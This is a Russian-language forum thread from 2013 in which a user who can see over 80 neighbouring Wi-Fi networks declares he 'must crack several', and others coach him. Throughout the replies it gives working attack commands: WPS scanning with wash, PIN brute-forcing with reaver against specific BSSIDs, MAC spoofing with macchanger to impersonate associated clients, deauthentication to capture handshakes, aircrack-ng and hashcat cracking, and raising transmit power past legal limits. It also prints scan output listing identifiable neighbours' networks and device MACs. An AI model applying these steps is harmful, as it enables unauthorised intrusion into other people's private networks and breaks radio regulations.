 |
|
12.05.2013, 04:25
|
|
Новичок
Регистрация: 08.05.2013
Сообщений: 5
С нами:
6849686
Репутация:
0
|
|
как узнать mac клиента, что коннектился к АР?
|
|
|
12.05.2013, 04:38
|
|
Познающий
Регистрация: 28.03.2013
Сообщений: 43
С нами:
6908726
Репутация:
0
|
|
Сообщение от Alookard
как узнать
mac клиента, что коннектился к АР
?
00:26:5A:6D:C8:B6 точка доступа, к которой ассоциируется клиент с маком 00:24:2C:13:9E:49
Это смотри под строками
BSSID STATION PWR Rate Lost Packets Probes
00:26:5A:6D:C8:B6(точка) 00:24:2C:13:9E:49(клиент)
//Почитай _http://www.levinkv.ru/wi-fi
|
|
|
|
12.05.2013, 10:03
|
|
Новичок
Регистрация: 08.05.2013
Сообщений: 5
С нами:
6849686
Репутация:
0
|
|
funny_kaplan, спасибо, понял, но у меня там написано (not associated), почти всегда. почему так происходит?
можно ли использовать airodump-ng и besside-ng mon0 одновременно?
ок, пойду почитаю..
добавлю: начал ходить с ноутом по квартире: там столько точек доступа, что таблица текущих ассоциаций клиентов к точкам уходит за монитор
больше 80 точек доступа. я обязан взломать несколько!
запустил sudo wash -i mon0 - пока тоже нечего. от этой команды будет толк? как и от besside-ng mon0?
Код:
root@bt:~# aircrack-ng *.cap
Opening f1-01.cap
Opening f1-02.cap
Opening kurg1-01.cap
Opening n11-01.cap
Opening nast1-01.cap
Opening rozi1-01.cap
Opening san1-01.cap
Opening t11-01.cap
Opening t11-02.cap
Opening tes1-01.cap
Opening tp-lin1-01.cap
Opening wep.cap
Opening wpa.cap
Opening z11-01.cap
Opening zhdan1-01.cap
Read 247848 packets.
# BSSID ESSID Encryption
1 00:1E:58:B7:CB:B5 Nastya_Home No data - WEP or WPA
2 F8:D1:11:50:1C:1C Portal No data - WEP or WPA
3 34:08:04:11:A3:BC tase4ka EAPOL+No data - WEP or WPA
4 F8:1A:67:64:87:D6 TP-LINK_6487D6 No data - WEP or WPA
5 1C:BD:B9:7A:DE:BD Zhdanov No data - WEP or WPA
6 F4:EC:38:D1:4D:04 kurguzov4ab EAPOL+No data - WEP or WPA
.....
.....
94 BC:AE:C5:A7:D5:7A 311 No data - WEP or WPA
95 90:F6:52:8A:32:50 VERA No data - WEP or WPA
Index number of target network ? 1
Opening f1-01.cap
Opening f1-02.cap
Opening kurg1-01.cap
Opening n11-01.cap
Opening nast1-01.cap
Opening rozi1-01.cap
Opening san1-01.cap
Opening t11-01.cap
Opening t11-02.cap
Opening tes1-01.cap
Opening tp-lin1-01.cap
Opening wep.cap
Opening wpa.cap
Opening z11-01.cap
Opening zhdan1-01.cap
Got no data packets from target network!
Quitting aircrack-ng...
Код:
root@bt:~# airodump-ng -w f1 mon0
CH 4 ][ Elapsed: 2 hours 55 mins ][ 2013-05-12 13:33 ][ paused output
^ BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
A0:F3:C1:7E:48:10 -34 292 0 0 6 54e. WPA2 CCMP PSK rozita 00:1E:58:B7:CB:B5 -51 17774 0 0 2 54 . WPA2 CCMP PSK Nastya_Home 34:08:04:11:A3:BC -60 44872 503 0 11 54e. WPA2 CCMP PSK tase4ka
1C:BD:B9:7A:DE:BD -66 42512 0 0 11 54 WPA TKIP PSK Zhdanov F4:EC:38:D1:4D:04 -74 21759 33 0 11 54e. WPA2 CCMP PSK kurguzov4ab
F8:1A:67:64:87:D6 -83 48814 0 0 6 54e. WPA2 CCMP PSK TP-LINK_6487D6
F8:D1:11:5C:AF:06 -82 15025 0 0 4 54e. WPA2 CCMP PSK svjat
00:18:39:2F:C0:58 -84 6059 0 0 6 54 WEP WEP Mashka
B0:48:7A:C1:82:E4 -84 603 0 0 4 54e. WPA2 CCMP PSK Race
90:94:E4:31:DF:F0 -85 1561 0 0 11 54e WPA2 CCMP PSK mix@
00:0E:F4:E0:97:00 -85 667 0 0 6 54e WPA2 CCMP PSK NikishaHome
00:27:22:8A:4C:C4 -85 943 0 0 1 54e. WEP WEP kurguz11a
94:0C:6D:C4:4D:28 -85 1874 0 0 1 54 . WPA2 CCMP PSK Network
F0:7D:68:9D:03:06 -85 1744 0 0 9 54e. WPA2 CCMP PSK Sasha
54:E6:FC:B7:3C:0C -86 3863 0 0 4 54e. WPA CCMP PSK Tynycoon
84:C9:B2:AB:3B:D4 -86 324 0 0 1 54e WPA2 TKIP PSK Dom
54:E6:FC:DC:76:E8 -86 271 0 0 9 54e. WPA2 CCMP PSK 313k ^ 1C:7E:E5:40:F8:E8 -87 1529 0 0 2 54e. WPA2 CCMP PSK Broadcom
00:0E:F4:E0:6D:8A -87 1177 0 0 1 54 WPA2 CCMP PSK kievskaya ^ 90:F6:52:3D:D6:1E -87 9071 0 0 1 54e. WPA2 CCMP PSK PollyComm-16
C8:BE:19:B0:8D:66 -87 1182 0 0 8 54e WPA2 CCMP PSK DIR-300
00:14:D1:B5:46:33 0 413 0 0 1 54e WPA2 CCMP PSK Sanya
BSSID STATION PWR Rate Lost Frames Probe
(not associated) F8:D1:11:07:2A:78 -77 0 -12 0 5
(not associated) 00:1F:3C:73:F9:38 -79 0 -12 0 103
(not associated) 28:98:7B:3E:E3:3A -85 0 -12 0 32 svjat
(not associated) 48:5D:60:06:E2:23 -87 0 -12 0 24
|
|
|
|
12.05.2013, 15:48
|
|
Познающий
Регистрация: 28.03.2013
Сообщений: 43
С нами:
6908726
Репутация:
0
|
|
Сообщение от Alookard
sudo wash -i mon0
- пока тоже нечего. от этой команды будет толк? как и от
besside-ng mon0
?
Запускай так:
sudo wash -i mon0 -C
В конце параметр -C
Выберешь юзера с WPS и далее его reaver'ом.
|
|
|
|
12.05.2013, 16:21
|
|
Новичок
Регистрация: 08.05.2013
Сообщений: 5
С нами:
6849686
Репутация:
0
|
|
Сообщение от funny_kaplan
Запускай так:
sudo wash -i mon0
-C
В конце параметр -C
Выберешь юзера с WPS и далее его reaver'ом.
- много ошибок, идет повтор первого пина много раз (предположительно до бесконечности), пробовал разные точки.. возможно, нужно еще какой-то параметр
|
|
|
|
12.05.2013, 17:18
|
|
Познающий
Регистрация: 28.03.2013
Сообщений: 43
С нами:
6908726
Репутация:
0
|
|
Сообщение от Alookard
sudo reaver -i mon0 -b BC:AE:C5:713:17 -vv
- много ошибок, идет повтор первого пина много раз (предположительно до бесконечности), пробовал разные точки.. возможно, нужно еще какой-то параметр
Возможно точка далеко, пробуй ночью, реально лучше ИМХО.
запускай так:
sudo reaver -i mon0 -b CC:5D:4E:98:2A:22 -a -vv -c 2
где -c это номер канала, на котором АР, в данном случае 2
//Убедись, что на точке есть WPS, может мак сменить свой надо хз..:
так:
sudo ifconfig wlan1 down
sudo macchanger wlan1 --mac=BC:CF:CC:C5:2E:47
sudo ifconfig wlan1 up
где wlan1 - это физический девайс
--mac=BC:CF:CC:C5:2E:47 тут укажешь желаемый мак, вернее не желаемый, а тот, что ассоциируется с точкой. Мак этот ты выше знаешь как словить.
//надо ставить macchanger, если его нет.
|
|
|
|
12.05.2013, 18:09
|
|
Новичок
Регистрация: 08.05.2013
Сообщений: 5
С нами:
6849686
Репутация:
0
|
|
на одной работает медленно, а на другой все по прежнему. может быть я не тот мак ввел. пробовал на двух разных. может быть там защита, можно как-то узнать?
что нужно написать, что бы я находил только клиентов? а то если ищу с точками, то на экран не влазят. а если к точке - то не находит, потому что там в графе (not associated).
/что такое Decloak в airodump-ng?
/в чем могут быть трудности? может быть, что у точек доступа хорошая связь и я их хорошо слышу, а они меня плохо и пользователей я плохо слышу?
/почему в airodump-ng я не вижу PRW больше 90? это какое-то ограничение? его можно отключить?
Код:
root@bt:~# airodump-ng -w f1 mon0
CH 4 ][ Elapsed: 12 hours 26 mins ][ 2013-05-12 23:03 ][ Decloak: 34:08:04:11:A3:BC
CH 10 ][ Elapsed: 12 hours 26 mins ][ 2013-05-12 23:03 ][ Decloak: 34:08:04:11:A3:BC
CH 1 ][ Elapsed: 12 hours 38 mins ][ 2013-05-12 23:16 ][ paused output
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
34:08:04:11:A3:BC -26 149245 13307 0 11 54e. WPA2 CCMP PSK tase4ka
F4:EC:38:D1:4D:04 -77 78610 4391 0 11 54e. WPA2 CCMP PSK kurguzov4ab
F8:1A:67:64:87:D6 -70 152572 2499 0 6 54e. WPA2 CCMP PSK TP-LINK_6487D6
1C:BD:B9:7A:DE:BD -65 134592 424 0 11 54 WPA TKIP PSK Zhdanov
90:F6:52:3D:D6:1E -86 24729 2 0 1 54e. WPA2 CCMP PSK PollyComm-16
00:1E:58:B7:CB:B5 -79 66291 0 0 2 54 . WPA2 CCMP PSK Nastya_Home
F8:D1:11:5C:AF:06 -83 26417 0 0 4 54e. WPA2 CCMP PSK svjat
FC:C8:97:96:85:14 -83 8678 0 0 11 54e. WPA2 CCMP PSK UKrtelecom_V6PaS4
F8:1A:67:64:CA:68 -85 2706 0 0 6 54e. WPA2 CCMP PSK NIKOZA
C8:BE:19:B6:92:64 -82 8482 0 0 7 54e WPA2 CCMP PSK DIR-300_MTM
94:0C:6D:C4:4D:28 -84 9318 0 0 1 54 . WPA2 CCMP PSK Network
00:1C:F0:3B:BD:FF -85 15212 0 0 2 54e. WEP WEP oleg4b69
00:18:39:2F:C0:58 -85 17304 0 0 6 54 WEP WEP Mashka
1C:7E:E5:40:F8:E8 -86 6081 0 0 2 54e. WPA2 CCMP PSK Broadcom
F4:6D:04:8C:A3:04 -87 243 0 0 1 54e WPA2 CCMP PSK Sergey
C8:3A:35:3E:28:E0 0 249 0 0 6 54e. WPA2 CCMP PSK Tenda_3E28E0
F4:EC:38:D6:AD:36 -86 20 0 0 11 54 . WPA2 CCMP PSK TP
84:C9:B2:AB:3B:D4 -87 536 0 0 1 54e WPA2 TKIP PSK Dom
FC:C8:97:98:4C:00 -86 2594 0 0 6 54e. WPA2 CCMP PSK Myzuchenko
F8:D1:11:18:4F:C2 -84 19409 0 0 1 54e. WPA2 MGT Shustrik
F0:7D:68:9D:03:06 -86 5088 0 0 9 54e. WPA2 CCMP PSK Sasha
BSSID STATION PWR Rate Lost Frames Probe
4:08:04:11:A3:BC CC:52:AF:12:6A:E8 0 12 - 1 1954 139993
34:08:04:11:A3:BC 00:16:6F:52:07:57 -56 0 -12 20 16965 tase4ka,Sunbel_pool,DOCOUA-Guest,Catering,Ketering,Sasha,ACK1,Botany Lobby,WiFiOffice
34:08:04:11:A3:BC 00:22:43:21:B1:59 -59 0 -12 23 14641 tase4ka,WWW-��_Network_1,NETGEAR
1C:BD:B9:7A:DE:BD 00:26:AB:17:70:27 -63 0 -12 0 94013 Zhdanov
1C:BD:B9:7A:DE:BD 78:DD:08:F2:BA:CB -75 0 -12 0 56402 Zhdanov
(not associated) 1C:B0:94:B7:4A:53 -73 0 - 9 32 163 internet vid sumtel.ua,Edimax,valentain,BELTELECOM WIFI,Galyan,Ridne misto,dlink,McDonalds4,KeryaNe
(not associated) 74:2F:68:DD:46:A8 -78 0 -12 0 49 Valdai
(not associated) 90:C1:15:E6:87:61 -79 0 -12 0 6 SHTUKA
(not associated) C8:60:00:43:E6:7E -80 0 -12 0 63
aireplay-ng --deauth применяю, но хендшейки не ловятсья. есть Decloak |
|
|
|
13.05.2013, 22:18
|
|
Новичок
Регистрация: 07.05.2013
Сообщений: 2
С нами:
6851126
Репутация:
0
|
|
Извиняюсь за то, что повторяюсь, но не получил ни одного ответа...
"Ничего не выходит с конвертацией CAP/PCAP в HCCAP файл, не "он", ни офф-лайн. Пробовал выбирать wireshark'ом лучшие 4 пакета и все попавшиеся EAPOL'ы. Поочередно экспортировал во все доступные форматы. Пробовал без выделения пакетов конвертировать common view'овский и airodump'овский файл и ничего. Много гуглил с решением этого вопроса, всем просящим отвечают: "У вас плохой хейндшейк, ловите новый"... Хотя поломал 2 вафли этими хендшами, как они могут быть плохими? Все 4 пакета в пределах секунды. Скорость в 4000 - это ад, хочется попробовать hashcat, но из-за конвертации ничего не выходит... Поделитесь своими мыслями!"
|
|
|
|
13.05.2013, 23:33
|
|
Флудер
Регистрация: 24.12.2011
Сообщений: 4,497
С нами:
7571126
Репутация:
373
|
|
Сообщение от tochkaskiff
Извиняюсь за то, что повторяюсь, но не получил ни одного ответа...
"Ничего не выходит с конвертацией CAP/PCAP в HCCAP файл, не "он", ни офф-лайн. Пробовал выбирать wireshark'ом лучшие 4 пакета и все попавшиеся EAPOL'ы. Поочередно экспортировал во все доступные форматы. Пробовал без выделения пакетов конвертировать common view'овский и airodump'овский файл и ничего. Много гуглил с решением этого вопроса, всем просящим отвечают: "У вас плохой хейндшейк, ловите новый"... Хотя поломал 2 вафли этими хендшами, как они могут быть плохими? Все 4 пакета в пределах секунды. Скорость в 4000 - это ад, хочется попробовать hashcat, но из-за конвертации ничего не выходит... Поделитесь своими мыслями!"
Возможно в Вашем хендшейке не было Beacon пакетов. Можете попробовать в hashcat конверторе Essid ломаемой точки доступа прописать.
|
|
|
|
21.05.2013, 12:00
|
|
Познающий
Регистрация: 10.07.2012
Сообщений: 73
С нами:
7284566
Репутация:
0
|
|
Никто не тестировал Wi-Fi адаптер TP-LINK TL-WN8200ND(имеет 2 антенны) и как она по сравнению TP-LINK TL-WN7200ND и ALFA AWUS036H . Имею TP-LINK TL-WN7200ND для российского рынка, неплохая антенна, но интересно они все идут на рынок с одинаковой мощностью или в Европу и Америку помощней? И если написано 27 db, будет ли поддерживаться в Windows или всё равно не больше 20 db разрешённых законодательством?
P.S. Может кому пригодится: При использование Wi-Fi адаптера TP-LINK TL-WN7200ND программы часто не видят при сканировании сети(точки), помогает простое передергивание USB шнура из компьютера.
Прочитал в интернете:Никакими командами и потченными драйверами, в том числе и правкой реестра мощность не регулируется, оно зашито в EEPROM (энерго независимая память) чипа.
В линуксе менял мощность до 30dbm:
ifconfig wlan1 down
macchanger -r wlan1 (меняется автоматически свой MAC адрес)
iw reg set BO
iw dev wlan1 set txpower fixed 3000
ifconfig wlan1 up
iwconfig wlan1(проверяем свой адаптер на выставленную мощность)
После этого запускал airodump-ng и проверял точки на мощность сигнала, что при 20 dbm,что при 30 dbm мощность сигнала от точек, так и не изменилась.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
